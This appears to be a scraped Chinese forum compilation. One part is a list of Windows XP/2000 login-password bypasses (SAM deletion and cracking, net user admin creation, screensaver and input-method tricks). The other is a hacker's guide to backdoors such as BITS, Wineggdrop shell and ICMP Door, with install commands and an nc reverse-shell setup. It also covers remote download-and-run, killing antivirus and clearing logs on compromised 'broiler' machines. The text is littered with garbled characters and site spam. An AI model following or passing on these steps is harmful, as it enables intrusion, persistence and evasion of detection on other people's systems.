cmd怎么捞取不同名称的数据

① 系统密码被改进不去电脑怎么办

用启动盘进入DOS，依次输入：（以下假设c盘为系统盘。）
del c:windows\system32\config\sam
c:windows\repair\sam c:windows\system32\config
这种方法最关键是repair文件下有一个备份过的SAM文件，如果你在优化系统时删除了，那我只能说：对不起，让你白看了这么多！
此方法在FAT32 、WinXP SP1、sp2下测试通过。 如果是NTFS格式的，可以用DOS for NTFS试试。2000 SP4也应该没问题，大家自己可以试试
在DOS下面新建用户:net user USERa(用户名) 123456(密码) /Add .接着使用“net localgroup administrators USERa(用户名) /Add”命令提升USERa用户为管理员级别，即拥有所有权限操作系统

忘记系统登入密码的十几种解决办法首先提议：
如果你是一个很容易遗忘的人，那么一定不要忘记在第一次设置密码的同时创建一张可以恢复Windows XP中的账户密码的启动盘，它可以让你免去格式化硬盘的烦恼。 从“控制面板”中找到“用户账户”项，选中自己的账户进入如图所示的控制界面，我们可以看到左侧任务列表中有一项“阻止一个已忘记的密码”，点击后便可打开“忘记密码向导”，向导会提示插入一张格式化过的空白磁盘，操作过程中会让你输入该账户所使用的密码，很快便可以创建一张密码重设盘。以后，当我们忘记了账户密码的时候，在没有使用“欢迎屏幕”登录方式的情况下登录到Windows XP后，按下“Ctrl + Alt + Del”组合键，出现“Windows 安全”窗口，点击选项中“更改密码”按钮，出现更改密码窗口。这个窗口中，将当前用户的密码备份，点击左下角“备份”按钮，激活“忘记密码向导”，按照提示创建密码重设盘。如果在Windows XP的登录窗口输入了错误的密码，就会弹出“登录失败”窗口，如果你的确想不起来自己的密码是什么时，可点击“重设”按钮，启动密码重设向导，通过刚才所创建的密码重设盘，就可以用这张密码重设盘更改密码并启动系统。重新设定密码，登录Windows XP。 “密码重设盘”的创建，含有一定的危险性，因为任何人都可以使用这一张“密码重设盘”来登录Windows XP，都可以以该用户的名义进入用户帐户，操作真正用户所能操作的一切，所以必须将“密码重设盘”保存在适当的地方，以防丢失或失泄密。J¬X H H
V ] ---------------------------------------中
方法1——利用“administrator”（此方法适用于管理员用户名不是“administrator”的情况）我们知道在安装Windows XP过程中，首先是以“administrator”默认登录，然后会要求创建一个新账户，以进入Windows XP时使用此新建账户登录，而且在Windows XP的登录界面中也只会出现创建的这个用户账号，不会出现“administrator”，但实际上该“administrator”账号还是存在的，并且密码为空。当我们了解了这一点以后，假如忘记了登录密码的话，在登录界面上，按住Ctrl+Alt键，再按住Del键二次，即可出现经典的登录画面，此时在用户名处键入“administrator”，密码为空进入，然后再修改“zhangbp”的口令即可。---------------------------------------------bbs.chinesei h
方法2——删除SAM文件（注意，此法只适用于WIN2000）Windows NT/2000/XP中对用户帐户的安全管理使用了安全帐号管理器（Security Account Manager , SAM）的机制，安全帐号管理器对帐号的管理是通过安全标识进行的，安全标识在帐号创建时就同时创建，一旦帐号被删除，安全标识也同时被删。安全标识是唯一的，即使是相同的用户名，在每次创建时获得的安全标识完全不同。因此，一旦某个帐号被用户名重建帐号，也会被赋予不同的安全标识，不会保留原来的权限。安全帐号管理器的具体表现就是%SystemRoot%\system32\config\sam文件。SAM文件是Windows NT/2000/XP的用户帐户数据库，所有用户的登录名以及口令等相关信息都会保存在这个文件中。知道了这些，我们的解决办法也产生了：删除SAM文件，启动系统，它会重建一个干净清白的SAM，里面自然没有密码了。
不过，这么简单的方法在XP是不适用的，可能微软以此为BUG，做了限制……所以现在在XP系统下，即使你删除了SAM，还是不能删除密码，反而会使系统启动初始化出错，从而进入死循环而不能进系统！！ --------------------------------------------- B6H i-[#D }-
方法3——从SAM文件中找密码（前提……会使用DOS基本命令就行）在系统启动前，插入启动盘，进入：C:\WINNT\System3\Config\ 用COPY命令将SAM文件复制到软盘上。拿到另一台机子读取。这里需要的工具是LC4，运行LC4，打开并新建一个任务，然后依次击“IMPORT→Import from SAM file”，打开已待破解的SAM文件，此时LC4会自动分析此文件，并显示出文件中的用户名；之后点击“Session→Begin Audit”，即可开始破解密码。如果密码不是很复杂的话，很短的时间内就会得到结果。 不过，如果密码比较复杂的话，需要时间会很长，这时我们就需要用下面的方法了。
---------------------------------------------中文之T
方法4——用其他SAM文件覆盖（前提是你可以得到另外一台电脑的SAM文件和它的密码……个人觉得是最为可行的办法）1——如上所说，SAM文件保存着登录名以及口令，那么我们只要替换SAM文件就是替换登录名以及口令了。不过，这个替换用的SAM文件的“产地”硬盘分区格式要和你的系统一样（看是FAT32还是NTFS，你自己确认）。最好这个“产地”的系统没有设密码，安全方面设置没动过（实际上很大部分的个人电脑都是这样），当然，比较保险的方式是把XP的[Win NT\System 32\Config\]下的所有文件覆盖到[C：\Win NT\System 32\Config\]目录中（假设你的XP安装在默认分区C：），2——如果得不到别人的帮助（我是说“万一”），你可以在别的分区上在安装一个XP系统，硬盘分区格式要和原来的一样，并且请你注意一定不要和原来的XP安装在同一分区！在开始之前，一定要事先备份引导区MBR，备份MBR的方法有很多，使用工具软件，如杀毒软件KV3000等。装完后用Administrator登陆，现在你对原来的XP就有绝对的写权限了，你可以把原来的SAM考下来，用10PHTCRACK得到原来的密码。也可以把新安装的XP的Win NT\System 32\Config\下的所有文件覆盖到C：\Win NT\System 32\Config\目录中（架设原来的XP安装在这里），然后用KV3000恢复以前悲愤的主引导区MBR，现在你就可以用Administrator身份登陆XP了。 [2号方案我自己都觉得麻烦，还是1号：叫别人帮忙比较好……]
【另外，据说C:\windows\repair 目录下的SAM是原始版本的，可以用它来覆盖 system32下的这个 SAM，这样就可以删除现在的密码，而恢复到刚开始安装系统时的密码了。如果这个密码为空，岂不是…… 】 中文之家---------------------------------------------中
方法5——使用Win 2000安装光盘引导修复系统（前提……很明显吧？就是你要有一张Win 2000安装光盘） bbs.chinesejia. 使用Win 2000安装光盘启动电脑，在Wndows2000安装选择界面选择修复Windows 2000（按R键）；，然后选择使用故障控制台修复（按C键），系统会扫描现有的Window2000／XP版本。一般只有一个操作系统，所以只列出了一个登录选择（l：C：＼Windows）。从键盘上按l，然后回车，这个时候，Window XP并没有要求输人管理员密码，而是直接登录进入了故障恢复控制台模式（如果使用的是Windows XP安装光盘启动的，那是要求输人管理员密码的。这里指的管理员是指系统内建的Administraor账户）熟悉Windows的朋友都知道，故障恢复控制台里面可以进行任何系统级别的操作，例如：复制、移动、删除文件，启动、停止服务，甚至格式化、重新分区等破坏性操作。 测试使用光盘：集成SP3的Windows 2000 Proessional 简体中文版。-?!I7Z O V u'r 测试通过的系统：Windows XP Proessional，打SPI补丁的Windows XP （FAT32和NTFS文件系统都一样）bbs.chinesejia.com8U L¬w T [需要注意的是，由于各种原因，市面上的一些Windows 2000安装光盘不能够显现故障控制台登录选项，所以也无法利用这个漏洞。同时，由于故障控制台模式本身的限制，也无法从网络上利用这个漏洞，换句话说，这个漏洞仅限于单机。]
---------------------------------------------
方法6——利用NET命令（有两个必要前提才行：按装WINDOWS XP的分区必须采用FAT 32文件小系统，用户名中没有汉字。）S&q5@ I*I Y)t 我们知道在Windows XP中提供了“net user”命令，该命令可以添加、修改用户账户信息，其语法格式为： net user [UserName [Password | *] [options]] [/domain] net user [UserName {Password | *} /add [options] [/domain] net user [UserName [/delete] [/domain]] D每个参数的具体含义在Windows XP帮助中已做了详细的说明，在此笔者就不多阐述了。好了，我们现在以恢复本地用户“zhangbq”口令为例，来说明解决忘记登录密码的步骤：
1、重新启动计算机，在启动画面出现后马上按下F8键，选择“带命令行的安全模式”。
2、运行过程结束时，系统列出了系统超级用户“administrator”和本地用户“zhangbq”的选择菜单，鼠标单击“administrator”，进入命令行模式。
3、键入命令：“net user zhangbq 123456 /add”，强制将“zhangbq”用户的口令更改为“123456”。若想在此添加一新用户（如：用户名为abcdef，口令为123456）的话，请键入“net user abcdef 123456 /add”，添加后可用“net localgroup administrators abcdef /add”命令将用户提升为系统管理组“administrators”的用户，并使其具有超级权限。bbs.chinesejia.com8R z }![4`
4、重新启动计算机，选择正常模式下运行，就可以用更改后的口令“123456”登录“zhangbq”用户了。另外，zhangbq 进入 登入后在〔控制台〕→〔使用者帐户〕→选忘记密码的用户，然后选〔移除密码〕后〔等出〕 在登入画面中选原来的用户便可不需密码情况下等入 (因已移除了) 删除刚才新增的用户，在〔控制台〕→〔使用者帐户〕→选〔alanhkg888〕，然后选〔移除帐户〕便可中文之家论坛#B2F
e;A!\ P( [但是有人提出：在实验后得知——在安全模式命令符下新建的用户不能进入正常模式（此结论暂不确认）]
方法7——用破解密码软件（前提是你要有标准的系统安装光盘——不是那种“集成”多个系统的D版盘） bbs.chinesejia.com wj)\6[$R
1——使用PASSWARE KIT 5.0中的Windows KEY 5.0，用于恢复系统管理员的密码，运行后生成3个文件：TXTSETUP.OEM、WINKEY.SYS和WINKEY.INF，3个文件共50KB。把这3个文件放在任何软盘中，然后使用XP安装光盘启动电脑，启动过程中按F6键让系统采用第三方驱动程序。此时，正是我们切入的最好时机，放入该软盘就会自动跳到Windows KEY的界面。他会强行把ADMINISTRATOR的密码换成12345，如此一来何愁大事不成？嗬嗬！当你重新启动以后，你会被要求再次修改你的密码。
2——使用OFFICE NT PASSWORD & REGISTRY EDITOR.用该软件可以制作LINUX启动盘，这个启动盘可以访问NTFS文件系统，因此可以很好地支持Windows 2000/XP。使用该软盘中的一个运行在LINUX下的工具NTPASSWD就可以解决问题，并且可以读取注册表并重写账号。使用方法很简单，只需根据其启动后的提示一步一步做就可以了。在此，建议你使用快速模式，这样会列出用户供你选择修改那个用户密码。默认选择ADMIN组用户，自动找到把ADMINISTRATOR的名字换掉的用户，十分方便。中文之家,软件,影视,图片,音乐,游戏,文学,娱乐,下载,在线,军事 t'`8x"a!J
3——ERD.Commander2003为Windows的管理员和最终用户，面对随时可能崩溃的系统，可能每人都会有自己的一套工具，用来挽救数据和修复系统。ERD Commander这可以算是Winternals Administrators' Pak工具中最强大的组件了，其中一个引人注目的功能就是修改密码，Windows NT/2000/XP/2003 系统中任何一个用户的密码都可以在不知道原先密码的情况下被ERD修改掉。
d5\---------------------------------------------中文之家
方法8——修改屏幕保护程序（前提是你有设置屏保）使用NTFSDOS这个可以从DOS下写NTFS分区的工具。用该软件制作一个DOS启动盘，然后到C:\Win NT\System 32下将屏幕保护程序Logon.Scr改名，接着拷贝Command.com到C:\Win NT\System 32下（WIN2000下可以用CMD.EXE），并将该文件改名为Logon.Scr。这样启动机器15分钟以后，本该出现的屏幕保护现在变成了命令行模式，而且是具有ADMINISTRATOR权限的，通过他就可以修改密码或者添加新的管理员账号了。改完以后不要忘了把屏幕保护程序的名字改回去。
---------------------------------------------中文之
2j方法9——使用启动脚本（前提……会使用DOS基本命令就行）
Windows XP启动脚本(startup scrīpts)是计算机在登录屏幕出现之前运行的批处理文件，它的功能类似于Windows 9×和DOS中的自动执行批处理文件autoexec.bat。利用这个特性，可以编写一个批处理文件重新设置用户密码，并将它加入启动脚本中，这样就达到了目的。以下是具体步骤（假设系统目录为C：\Windows）。
1.使用Windows98启动盘启动电脑。在DOS下新建一个文件叫a.bat，内容只需要一条“net user”命令即可：“Net user rwd 12345678”。这条命令的意思是将用户rwd的密码设置为“12345678”（有关Net命令的用法，可参考Windows帮助）。然后将文件a.bat保存到“C:\windows\system32\GroupPolicy\Machine\scrīpts\Startup”下。
2.编写一个启动/关机脚本配置文件scrīpts.ini，这个文件名是固定的，不能改变。内容如下：中文之家,论坛,软件,影视,图片,音乐,游戏,文学,娱乐,下载,在线,军事%l v,R!b W \#^ M D
[Startup]中文之家,软件,影视,图片,音乐,游戏,文学,娱乐,下载,在线,军事+X9x2B6m:E"e v @ V V
0CmdLine=a.bat
0Parameters=中文之家,论坛,软件,影视,图片,音乐,游戏,文学,娱乐,下载,在线,军事3L e&o2H&{
3.将文件scrīpts.ini保存到“C:\winnt\system32\GroupPolicy\Machine\scrīpts”下。scrīpts.ini保存着计算机启动/关机脚本的设置数据，文件内容通常包含两个数据段：[Startup]和[Shutdown]。[Startup]数据段下是启动脚本配置，[Shutdown]数据段下是关机脚本配置。每个脚本条目被分成脚本名和脚本参数两部分存储，脚本名保存在XCmdLine关键字下，参数保存在XParameters关键字下，这里的X表示从0开始的脚本序号，以区别多个脚本条目和标志各脚本条目的运行顺序。中文之家,论坛,软件,影视,图片,音乐,游戏,文学,娱乐,下载,在线,军事 w;o _ s9u G d h
4.取出Windows 98启动盘，重新启动电脑，等待启动脚本运行。启动脚本运行结束后用户rwd的密码就被恢复为“12345678”。
5.登录成功后删除上述步骤建立的两个文件。
[实际上你可以借用另一台电脑用“记事本”编写a.bat和scrīpts.ini，再用软盘通过DOS复制到自己的电脑上] 说明：Q,{ 以上脚本使用的是FAT32文件系统，如果使用NTFS文件系统，可以将这块硬盘以从盘模式挂接到其它能识别NTFS文件系统（如Windows 2000或Windows XP）的计算机上进行上述操作。本方法可以恢复管理员（Administrator）的密码。对Windows2000系统中本地计算机用户和域用户的密码恢复同样有效。&r m ` Y N)s"u
------------------------------------------------------------------------------------------------------
个人瞎猜的方法
[1[G `¬y S==============bbs.chinesej
m-z6l 方法10——利用输入法漏洞（前提是进入系统看见的不是欢迎界面，而是一般的系统网络用户登陆窗口）
[其奥义取自网管软件登陆的破解，没有在系统里实验过。不过倒也没有后遗症，你们姑且试试]bbs.chinesejia.com Y P"i K9` fh r
按ctrl+shift打开拼音输入法，出现拼音的状态条，在状态条上点击右键，就会出现一个下拉菜单，选择其中的定义词组(放心，就算系统限制右键，在这也不管用)然后选择文件菜单里面的保存，就会调出保存对话框，然后随便选择一个文件夹，点击右键，选择资源管理器，打开，进去添加个超级用户，一切就OK啦！
（另外也可以用下拉菜单里的[帮助]，打开CHM帮助文件，[选项]-[Internet选项]-[Internet临时文件夹]-[设置]-[查看文件]，同样可以进文件夹）中文之家,软件,影视,图片,音乐,游戏,文学,娱乐,下载,在线,军事 X!v S"j.b
另外也可以利用输入法BUG，这个方法很简单：就是调出输入法，调到智能ABC，输入VV。然后按左方向键，光标到字母最前面，按DEL删掉，按空格，这时系统提示出错，登陆窗口就被关掉了。进去后……要怎么做，不用多说吧？中文之家,论坛,软件,影视,图片,音乐,游戏,文学,娱乐,下载,在线,军事 K3t7^ l'u k
A,p V n Q ?[这方法的初衷无非是先进入系统，再更改添加用户。大不了放弃原先的管理员用户，自己另建一个使用……]
方法11——使用注册表（前提……你敢修改注册表） [借鉴于“修改注册表自动登陆系统”]
“修改注册表自动登陆系统”的内容如下：
【单击“开始 运行”，在输入框中键入“regedit”打开注册表编辑器，然后在注册表编辑器左方控制台中依次单击展开“HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows NT/Current Version/Winlogon”，再选择“编辑 添加 字符串值”，在数值名称中键入“AutoAdminLogon”，然后在窗口中的空白位置上点一下，再双击刚新建的字符串“AutoAdminLogon”，在弹出的“编辑字符串”对话框中输入“1”设置系统允许自动登录。再重复以上的操作，创建一个名为“DefaultUserName”的字符串值，编辑字符串为您准备用于自动登录的账户名称。再新创建一个名为“Defaultpassword”的字符串值，并编辑字符串为您准备用于自动登录的用户账户密码，编辑完并检查无误后，关闭注册表编辑器并重新启动电脑即可自动登录。注意，如果已有“DefaultUserName”，可以不必重新创建，直接更改原有字符串值。如果您的系统工作在局域网环境下，并且在登录到系统上时需要登录域服务器，那么您还需要再添加一个“DefaultDomainName”并编辑字符串为您登录的域名称。】
而我在修改注册表时，发现里面本来就有“Defaultpassword”的字符串，（这是我的个人情况），当然，我原来就没有设密码，所以字符串的值为空。我是想，如果你们的系统也有“Defaultpassword”的字符串，那是否它的值就是密码呢？
或者你们谁敢以上文的方法修改注册表，没准会屏蔽原先的登陆窗口呢！当然，要先备份注册表。
关于SAM文件
%N 使用过NT内核Windows操作系统的朋友都知道NT内核对系统密码的管理机制比Win32内核的Windows操作系统要强得多，这部分归功于NT系统的门卫——SAM。 a x F u3U+r0K对于Windows的启动，很多用户并没什么特别的想法，大多数的人都这样看待这个问题：按下电源，稍等片刻，“傻瓜化”的Windows登录界面就出现在我们眼前。但是看了此文，你也许就会有点不同的想法了。
bbs.chi微软做了两个不同的系统骨架，一个叫Win32，我们用的Win9x/Me系统就附在它上面；另一个叫NT（New Technology），也就是WinNT/2000/XP/2003的骨架。不过很不幸，微软有点“偏心”，Win32的骨架做得明显有点过小，所以它成了瘦子，而NT则是典型的美国壮汉。更不幸的是，微软给Win32配备的PWL门卫是个花瓶，不仅连个家门都看不住，而且嘴巴也守不住秘密；而NT呢，又捞了个好处，SAM门卫尽心尽责，嘴巴也难撬开。NT内核Windows操作系统的密码安全性较Win32内核Windows操作系统的密码安全性高出很多跟SAM不无关系，在这篇文章里，我们就一起来认识一下NT内核Windows操作系统的看门神——SAM。
Y¬?¬T h忠实的SAM门卫 中文之g%{"W(D4So r
SAM最初是跟随第一代NT来到世界的，它在微软总部的特工代号叫做“安全账户管理器”（Security Accounts Manager），经历了几代系统的改进，这个门卫越来越强壮了。SAM平时居住在WINNT\System32\Config下。当然，它不仅仅是一个SAM文件这么简单，它还带有一名随从：Security（如图1所示）。在NT内核Windows系统启动的时候，SAM就开始忙碌了，首先，它在入口处要求你出示身份证——没有？那么就不能进入Windows，并且没得商量。即使你通过了“门检”，事情也还远远没有结束，SAM随时盯着你呢，只要哪里又有人进来了，它就赶紧去问人家要“证件”……SAM记录的数据很多，包括所有组、账户信息、密码HASH、账户SID等，应该说是一个考虑得比较周全的门卫。
前面说过了，SAM不仅仅是一个文件那么简单，它不但有文件数据，在注册表里面还有一个数据库，位于HKEY_LOCAL_MACHINE\SAM下，这是一个比较复杂的结构（如图所示）。SAM在系统启动后就处于锁定状态，我们没法擅自更改这个文件内容。
SAM的主要结构和用户分组
从上述注册表里的分支我们可以看到以下结果： 中文之家,软件,影视,图片,音乐,游戏,文学,娱乐,下载,在线,军事 \3a C+T)f [ m7~
1.在HKEY_LOCAL_MACHINE\SAM\SAM\
Domains下就是SAM的内容，其下有两个分支“Account”和“Builtin”。 中文之家论坛8A:t;S
2.Domains\Account\Users下存放的就是各个账号的信息，当然，这里是加密过的二进制数据，每个账号下面有两个子项，F和V。项目V中保存的是账户的基本资料，用户名、所属组、描述、密码、注释、是否可以更改密码、账户启用、密码设置时间等。项目F中保存的是一些登录记录，比如上次登录时间、错误登录次数等。SAM靠这些齐全的备忘录来保存与用户账号相关的各种信息。 bbs.chinesejia.com W b S:i s|(bv$C J
3.Domains\Builtin存放着不同用户分组信息，SAM就是根据这个来划分NT中固有的6个不同的工作组的，它们分别是：管理员（Administrators）、备份操作员（Backup Operators）、客人（Guests）、高权限用户（Power Users）、修复员（Replicator）和普通用户（Users）。
中文幕后指挥官
在Windows系统中，虽然SAM如此尽力，但是它却如《Terminator 3（终结者3）》里MODEL 101的设置一样，不听从你的指挥。它只听本地安全认证（Local Security Authority）程序——LSASS.EXE的差遣，就连进门时的审查也是LSASS的指示。如果你把LSASS杀了，你就等着被赶出门吧——当然，对于普通用户来说，如果你试图用普通的进程管理工具或者Windows系统的进程管理杀掉“LSASS.EXE”进程的话，只会得到“该进程为关键系统进程，任务管理器无法结束进程。”的提示，本地安全认证（Local Security Authority）在Windows系统中主要负责以下任务：1.重新找回本地组的SID和用户权限；2.创建用户的访问令牌；3.管理本地安装的服务所使用的服务账号；4. 存储和映射用户权限；5.管理审核的策略和设置；6.管理信任关系。 中文之家,软件,影视,图片,音乐,游戏,文学,娱乐,下载,在线,军事 _ W;X w h
“萨姆也是人”
中文俗话说，“人无完人”。尽管SAM（萨姆）是这么尽心尽责，可是在这里，我们还是必须用那句话——“萨姆也是人”来形容它。由于一些设计上的失误，在WinNT/2000里，如果你忘记了密码，那么你要做的不是呼天喊地，只需要在非NT环境里把SAM驱逐出硬盘就可以了。但是在XP以后的Windows操作系统里，这个情况得以改善，如果你把萨姆大叔踢了，NT也躲着死活不肯出来了。
当然，这也并不是说XP以后的Windows的操作系统密码都无法破解，要知道：经典的LC4和NtPassword都专门拿SAM开刀.

② 后门程序的分类

后门可以按照很多方式来分类，标准不同自然分类就不同，为了便于大家理解，我们从技术方面来考虑后门程序的分类方法： 此类后门程序一般都是服务器上正常 的web服务来构造自己的连接方式，比如非常流行的ASP、cgi脚本后门等。
网页后门，网络上针对系统漏洞的攻击事件渐渐少了，因为大家在认识到网络安全的重要性之后，最简单却又最有效的防护办法：升级，都被大家所认同，所以系统漏洞在以后的岁月中存活的周期会越来越短，而从最近的趋势来看，脚本漏洞已经渐渐取代了系统漏洞的地位，非常多的人开始研究起脚本漏洞来，sql注入也开始成为各大安全站点首要关注热点，找到提升权限的突破口，进而拿到服务器的系统权限。
asp、CGI、PHP这三个脚本大类在网络上的普遍运用带来了脚本后门在这三方面的发展。
线程插入后门
利用系统自身的某个服务或者线程，将后门程序插入到其中，具体原理原来《黑客防线》曾具体讲解过，感兴趣的朋友可以查阅。这也是现在最流行的一个后门技术。
扩展后门
所谓的“扩展”，是指在功能上有大的提升，比普通的单一功能的后门有很强的使用性，这种后门本身就相当于一个小的安全工具包，能实现非常多的常见安全功能，适合新手使用————但是，功能越强，个人觉得反而脱离了后门“隐蔽”的初衷，具体看法就看各位使用者的喜好了。
c/s后门
和传统的木马程序类似的控制方法，采用“客户端/服务端”的控制方式，通过某种特定的访问方式来启动后门进而控制服务器。
root kit 6o f3H 3B
这个需要单独说明，其实把它单独列一个类在这里是不太恰当的，但是，root kit的出现大大改变了后门程序的思维角度和使用理念，可以说一个好的root kit就是一个完全的系统杀手!后文我们讲涉及到这方面，一定不会让大家失望!
上面是按照技术做的分类，除了这些方面，正向连接后门、反向连接后门等分类也是很常见的，其实如何分类是编程者考虑的事，广大的使用者就不用考虑那么多了，我们看重的，只是功能! 首先我们来简单解释一下什么是典型的线程插入后门:这种后门在运行时没有进程,所有网络操作均播入到其他应用程序的进程中完成。也就是说，即使受控制端安装的防火墙拥有“应用程序访问权限”的功能，也不能对这样的后门进行有效的警告和拦截，也就使对方的防火墙形同虚设了!因为对它的查杀比较困难，这种后门本身的功能比较强大，是“居中家旅行、入侵攻击”的必备品哦!
这类的典范就是国内提倡网络共享的小榕的BITS了，从它的推出以来，各类安全工具下载园地里BITS就高居榜首，非常多的朋友使用它的过程中感到了方便。类型：系统后门
使用范围：wind200/xp/2003
隐蔽程序：★★★★☆
使用难度：★★★☆☆
查杀难度：★★★★☆
BITS其实是Background Intelligent Transfer Servicer的缩写，可以在不知不觉中实现另一种意义的典型的线程插入后门，有以下特点：进程管理器中看不到;平时没有端口，只是在系统中充当卧底的角色;提供正向连接和反向连接两种功能;仅适合用于windows 200/xp/2003。
运用举例
首先我们用3389登录上肉鸡，确定你有SYSTEM的权限，将BITS.DLL拷贝到服务器上，执行CMD命令： 4 #R Br A
rundll32.exebits.dll,install
这样就激活了BIST，程序用这个特征的字符来辨认使用者，也就相当于你的密码了，然后卸载：rundll32.exe BITS.dll,Uninstall
这是最简单的使用，这个后门除了隐蔽性好外，还有两大特点是非常 值得借鉴的：端口复用和正反向连接。虽然很多朋友经常听到这两个名词，但并不了解它们，端口复用就是利用系统正常的TCP端口通讯和控制，比如80、139等，这样的后门有个非常 大的好处就是非常 隐蔽，不用自己开端口也不会暴露自己的访问，因为通讯本身就是系统的正常访问!另一个是反向连接，这个很常 见，也是后门中一个经典思路，因为从服务器上主动方问外边是不被禁止的，很多很历害的防火墙就怕这点!
BITS的正向连接很简单，大家可以参考它的README，这种方式在服务器没有防火墙等措施的时候很管用，可以方便地连接，但是遇到有防火墙这样的方式就不灵了，得使用下面的反向连接方式： 70 +g3l
在本地使用NC监听(如：nc -l -p 1234)
用NC连接目标主机的任何一个防火墙允许的TCP端口(80/139/445……)
输入激活命令：[email=hkfx@dancewithdolphin[rxell]:1.1.1.1:2222]hkfx@dancewithdolphin[rxell]:1.1.1.1:2222[/email] ^q/hQ , 4
目标主机的CMD将会出现NC监听的端口2222，这样就实现了绕过防火墙的功能了。 所谓的扩展后门，在普通意义上理解，可以看成是将非常多的功能集成到了后门里，让后门本身就可以实现很多功能，方便直接控制肉鸡或者服务器，这类的后门非常受初学者的喜爱，通常集成了文件上传/下载、系统用户检测、HTTP访问、终端安装、端口开放、启动/停止服务等功能，本身就是个小的工具包，功能强大。
Wineggdroup shell j;类型：系统后门
使用范围：win2000/xp/2003
隐蔽程度：★★★★☆
使用难度：★★☆☆☆
危害程度：★★★★☆
查杀难度：★★★★☆
这个后门是扩展后门中很有代表性的一个，功能这全面让人叹为观止，它能实现如下比较有特色的功能：进程管理，可查看，杀进程(支持用进程名或PID来杀进程);注册表管现(查看，删除，增加等功能);服务管理(停止，启动，枚举，配置，删除服务等功能)端口到程序关联功能(fport);系统重启，关电源，注销等功能(reboot,poweroff,shutdown,logoff);嗅探密码功能;安装终端，修改终端端口功能;端口重定向功能(多线程，并且可限制连接者IP);HTTP服务功能(多线程，并且可限制连接者IP);Socd5代理功能(支持两种不同方式验证，可限制连接者IP);克隆账号，检测克隆账户功能(clone,checkclone);加强了的FindpassWord功能(可以得到所有登录用户，包括使用克隆账户远程登录用户密码);HTTP代理(完全匿名，支持oicq、 MSN、mirc等程序);其他辅助功能，http下载，删除日志，系统信息，恢复常用关联，枚举系统账户等。
当网络上刚推出这个后门的时候，非常多的人用它来替换自己原来使用的后门，一时间各处赞扬之声迭起，但多为一些普通的打捞手的心声，其实它和“后门”的原始定义是有出入的：一旦你需要实现越多的功能，那你的程序在执行、隐藏、稳定等方面就需要考虑非常多的问题，一个疏忽就会导致全盘皆败，所以不建议将此后门用在需要非常隐蔽的地方。
运用举例
在安装后门前，需要使用它自带的EditServer.exe程序对服务端进行非常详细的配置，从10个具体配置中，包括了插入线程、密码、IP登录邮件通告等方面，不难看出它的功能是非常强大的，隐蔽性也很强，下面说几个在入侵中常用的功能，相信经常玩入侵的朋友一定能发现它的强大之处：
Fport:列出进程到端口的列表，用于发现系统中运行程序所对应的端口，可以用来检测常见的隐蔽的后门。
Reboot:重启系统，如果你上传并运行了其他后门程序，并需要重启机器以便让后门正常工作，那使用这个命令吧! Uz
Shell:得到一个Dos Shell,这个不多讲了，直接得到服务器或者肉鸡上的cmd shell。
Pskill PID或程序名：用于杀掉特定的服务，比如杀毒软件或者是防火墙。
Execute程序：在后台中执行程序，比如sniffer等。http://ip/文件名 保存文件名：下载程序，直接从网上down一个后门到服务器上。
Installterm端口：在没有安装终端服务的win2k服务版的系统中安装终端服务，重启系统后才生效，并可以自定义连接端口，比如不用3389而用其他端口。
StopService/StartService:停止或者启动某个系统服务，比如telnet。
CleanEvent:删除系统日志。
Redirect:TCP数据转发，这个功能是后门程序中非常出色的一个功能，可以通过某一端口的数据转发来控制内网的机器，在渗透入侵的时候非常管用!
EnumService:列举所有自动启动的服务的资料，比如后门、木马。
RegEdit:进入注册表操作模式，熟悉注册表的使用者终于在后门中找到了福音! !
Findpassword:得到所有登录用户密码，比我们常用的findpass功能可强多了。
总体来讲，Wineggdrop shell是后门程序中很出彩的一个，它经过作者几次大规模的修改和升级，已经趋于稳定，功能的强大当然没得说，但是由于功能太强大，被查杀和怀疑是难以避免的，所以很多人在使用Wineggdrop shell一段时间后就发现肉鸡飞了，其实是很正常的事，我你出不用气馁，其实用很简单的方法就可以很好地提高它的隐蔽性，下文将有说明。
相对于Wineggdrop shell来说，独孤剑客的winshell在功能上就不那么全面了，但是笔者推荐新手更多的使用winshell而不是Wineggdrop shell，因为winshell功能除了获得一个shell以外，只加入了一些重启、关闭服务器的命令，功能相对简单，但完全使用系统自带的cmd来执行命令，对系统学习和掌握也是非常有帮助的!
Winshell和wolf这两者都是国内早期顶尖的后门程序，程序的编制无疑是非常经典的，新手学习时使用这两款后门一定能让你明白很多系统相关东西，了解很多入侵思路和方法。 传统的木马程序常常使用C/S构架，这样的构架很方便控制，也在一定程度上避免了“万能密码”的情况出现，对后门私有化有一定的贡献，这方面分类比较模糊，很多后门可以归结到此类中，比如较巧妙的就是ICMP Door了
类型：系统后门
使用范围：win2000/xp/2003 2Z6
隐蔽程度：★★★★★
使用难度：★★★☆☆
危害程度：★★★★☆
查杀难度：★★★★★
这个后门利用ICMP通道进行通信，所以不开任何端口，只是利用系统本身的ICMP包进行控制安装成系统服务后，开机自动运行，可以穿透很多防火墙——很明显可以看出它的最大特点：不开任何端口~只通过ICMP控制!和上面任何一款后门程序相比，它的控制方式是很特殊的，连80端口都不用开放，不得不佩服务程序编制都在这方面独特的思维角度和眼光!
运用举例
这个后门其实用途最广的地方在于突破网关后对内网计算机的控制，因为很多机密数据都是放在内网计算机上的，而控制内网计算机并不是我们想到位的商业网络进行入侵检测，它的网络内部并不像我们常见的内网那样非常容易入侵和控制，因为该公司本身涉及到一些网络安全的服务，所以内网个人计算机的防护是很到位的，在尝试过很多后门后，最后ICMP Door帮我实现了成功的渗透内网!由此笔者开始爱上这个后门。
首先使用icmpsrv.exe -install参数进行后门的安装，再使用icmpsend.exe IP进行控制，可以用：[http://xxx.xxx.xxx/admin.exe-hkfx.exe]方式下载文件，保存在[url=file://\system32]\system32[/url]目录下，文件名为hkfx.exe，程序名前的“-”不能省去，使用[pslist]还可以列出远程主机的进程名称和pid，再使用[pskill id]就可以杀进程了，同样，输入普通cmd命令，则远程主机也就执行了相关的命令。 ~HF1 ? %
这个后门是采用的c/s构架，必须要使用icmpsend才能激活服务器，但是他也有自己的先天不足：后门依靠ICMP进行通讯，经过冲击波的洗礼后，很少有服务器还接受ICMP包了，很多都屏蔽掉了它，所以用它来控制服务器不是一个好办法，这也是我为什么用它来控制内网计算机的原因了——内网很少有人屏蔽ICMP包吧? 这是ASP脚本方面流传非常广的一个脚本后门了，在经过几次大的改革后，推出了“海阳顶端ASP木马XP版”、“海阳顶端ASP木马红粉佳人版”等功能强大、使用方便的后门，想必经常接触脚本安全的朋友对这些都不会陌生。类型：网页木马
使用范围：支持ASP、WEB访问
使用难度：★☆☆☆☆
危害程序：★★★☆☆
